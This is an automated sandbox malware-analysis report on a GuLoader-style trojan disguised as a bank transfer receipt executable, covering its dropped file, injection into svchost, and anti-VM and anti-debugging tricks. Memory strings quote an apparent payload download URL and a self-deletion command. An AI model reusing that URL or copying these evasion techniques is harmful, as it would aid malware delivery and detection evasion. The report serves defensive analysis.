Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69B00 NtSetValueKey, 22_2_03A69B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A6A710 NtOpenProcessToken, 22_2_03A6A710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69760 NtOpenProcess, 22_2_03A69760
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69770 NtSetInformationFile, 22_2_03A69770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A6A770 NtOpenThread, 22_2_03A6A770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69A80 NtOpenDirectoryObject, 22_2_03A69A80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69A20 NtResumeThread, 22_2_03A69A20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69A00 NtProtectVirtualMemory, 22_2_03A69A00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69610 NtEnumerateValueKey, 22_2_03A69610
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69A10 NtQuerySection, 22_2_03A69A10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69670 NtQueryInformationProcess, 22_2_03A69670
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A695F0 NtQueryInformationFile, 22_2_03A695F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A699D0 NtCreateProcessEx, 22_2_03A699D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69520 NtWaitForSingleObject, 22_2_03A69520
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A6AD30 NtSetContextThread, 22_2_03A6AD30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69560 NtWriteFile, 22_2_03A69560
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69950 NtQueueApcThread, 22_2_03A69950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A698A0 NtWriteVirtualMemory, 22_2_03A698A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A698F0 NtReadVirtualMemory, 22_2_03A698F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69820 NtEnumerateKey, 22_2_03A69820
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A6B040 NtSuspendThread, 22_2_03A6B040
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D38680 NtReadFile, 22_2_02D38680
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D387B0 NtAllocateVirtualMemory, 22_2_02D387B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D38700 NtClose, 22_2_02D38700
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D385D0 NtCreateFile, 22_2_02D385D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D3867C NtCreateFile,NtReadFile, 22_2_02D3867C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D38622 NtCreateFile, 22_2_02D38622
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D387AA NtAllocateVirtualMemory, 22_2_02D387AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D385CD NtCreateFile, 22_2_02D385CD
PE file contains executable resources (Code or Archives)
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, 61538 bytes, 1 file
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Binary or memory string: OriginalFilename vs Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe, 00000000.00000003.294702939.000000000343E000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamenongrav.exe vs Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe, 00000000.00000000.293866460.0000000000F3A000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe, 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
PE file contains strange resources
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: nongrav.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Metadefender: Detection: 14%
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe ReversingLabs: Detection: 26%
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown Process created: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe "C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe"
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe"
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F31DC7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx, 0_2_00F31DC7
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/1@2/2
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F35849 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA, 0_2_00F35849
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F33E45 CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA, 0_2_00F33E45
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4456:120:WilError_01
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F34E80 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,#20,#22,#23,FreeResource,SendMessageA, 0_2_00F34E80
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Command line argument: Kernel32.dll 0_2_00F32A7E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wextract.pdb source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source: Binary string: wntdll.pdbUGP source: nongrav.exe, 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp, nongrav.exe, 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, svchost.exe, 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.788029496.0000000003800000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.786512054.0000000003600000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: nongrav.exe, nongrav.exe, 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp, nongrav.exe, 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, svchost.exe, svchost.exe, 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.788029496.0000000003800000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.786512054.0000000003600000.00000004.00000001.sdmp
Source: Binary string: wextract.pdbPp source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source: Binary string: svchost.pdb source: nongrav.exe, 0000000F.00000002.786712436.0000000000110000.00000040.00020000.sdmp, nongrav.exe, 0000000F.00000003.785460105.0000000000756000.00000004.00000001.sdmp
Source: Binary string: svchost.pdbUGP source: nongrav.exe, 0000000F.00000002.786712436.0000000000110000.00000040.00020000.sdmp, nongrav.exe, 0000000F.00000003.785460105.0000000000756000.00000004.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Unpacked PE file: 15.2.nongrav.exe.400000.1.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;
Yara detected GuLoader
Source: Yara match File source: 00000001.00000002.507414765.000000000067A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F378A1 push ecx; ret 0_2_00F378B4
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_00405A42 pushad ; iretd 1_2_00405A43
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_00407418 push esp; ret 1_2_00407419
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AA00C5 push 0000001Ch; ret 1_2_02AA00C7
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AA306C pushfd ; ret 1_2_02AA3073
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AA0043 push 0000001Ch; ret 1_2_02AA0045
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AA23A8 pushfd ; iretd 1_2_02AA23B8
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AA3993 push ebp; retf 1_2_02AA3A08
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AA3397 push eax; retf FA42h 1_2_02AA3493
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AA1339 push cs; retf 1_2_02AA133A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB1D0D1 push ecx; ret 15_2_1EB1D0E4
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_00527C89 push es; ret 15_2_00527C8B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_1_00405A42 pushad ; iretd 15_1_00405A43
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_1_00407418 push esp; ret 15_1_00407419
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_1_004015E0 push 0051A000h; ret 15_1_004015E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A7D0D1 push ecx; ret 22_2_03A7D0E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D3B87C push eax; ret 22_2_02D3B882
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D3B812 push eax; ret 22_2_02D3B818
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D3B81B push eax; ret 22_2_02D3B882
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D3514C push eax; iretd 22_2_02D35156
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D34E06 push EEE5C1DBh; ret 22_2_02D34E0B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D3B7C5 push eax; ret 22_2_02D3B818
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D35F04 push ecx; ret 22_2_02D35F0F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D2CCA8 push edi; ret 22_2_02D2CCF9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D34405 pushfd ; retf 22_2_02D34406
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F32DAE GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA, 0_2_00F32DAE
Source: initial sample Static PE information: section name: .text entropy: 7.15232961918

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F31910 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA, 0_2_00F31910
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe File opened: C:\Program Files\qga\qga.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: nongrav.exe, 00000001.00000002.507816361.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=
Source: nongrav.exe, 0000000F.00000002.787076443.00000000028E0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1PQ36FQ9YGHZAM_FHR1D0IRFRVEBW3FSZ
Source: nongrav.exe, 00000001.00000002.507816361.0000000002AF0000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787076443.00000000028E0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: nongrav.exe, 00000001.00000002.507462728.00000000006DC000.00000004.00000020.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEOWS
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 0000000002D28604 second address: 0000000002D2860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 0000000002D2898E second address: 0000000002D28994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe TID: 6996 Thread sleep count: 581 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\svchost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_004088C0 rdtsc 15_2_004088C0
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Window / User API: threadDelayed 581
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F3532F GetSystemInfo,CreateDirectoryA,RemoveDirectoryA, 0_2_00F3532F
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F321E7 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00F321E7
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe System information queried: ModuleInformation
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: nongrav.exe, 00000001.00000002.507816361.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=
Source: nongrav.exe, 00000001.00000002.507462728.00000000006DC000.00000004.00000020.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exeows
Source: explorer.exe, 00000015.00000000.735601007.000000000EEA7000.00000004.00000001.sdmp Binary or memory string: Prod_VMware_SATA
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: nongrav.exe, 0000000F.00000002.787076443.00000000028E0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ
Source: explorer.exe, 00000015.00000000.733803262.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: explorer.exe, 00000015.00000000.733926654.0000000008778000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 00000015.00000000.733803262.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 00000015.00000000.729770363.00000000067C2000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: explorer.exe, 00000015.00000000.729770363.00000000067C2000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: nongrav.exe, 00000001.00000002.507816361.0000000002AF0000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787076443.00000000028E0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: explorer.exe, 00000015.00000000.733803262.00000000086C9000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Thread information set: HideFromDebugger
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F32DAE GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA, 0_2_00F32DAE
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_004088C0 rdtsc 15_2_004088C0
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AA8E06 mov eax, dword ptr fs:[00000030h] 1_2_02AA8E06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AAB126 mov eax, dword ptr fs:[00000030h] 1_2_02AAB126
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AAC112 mov eax, dword ptr fs:[00000030h] 1_2_02AAC112
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AAAB56 mov eax, dword ptr fs:[00000030h] 1_2_02AAAB56
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC52A5 mov eax, dword ptr fs:[00000030h] 15_2_1EAC52A5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB446A7 mov eax, dword ptr fs:[00000030h] 15_2_1EB446A7
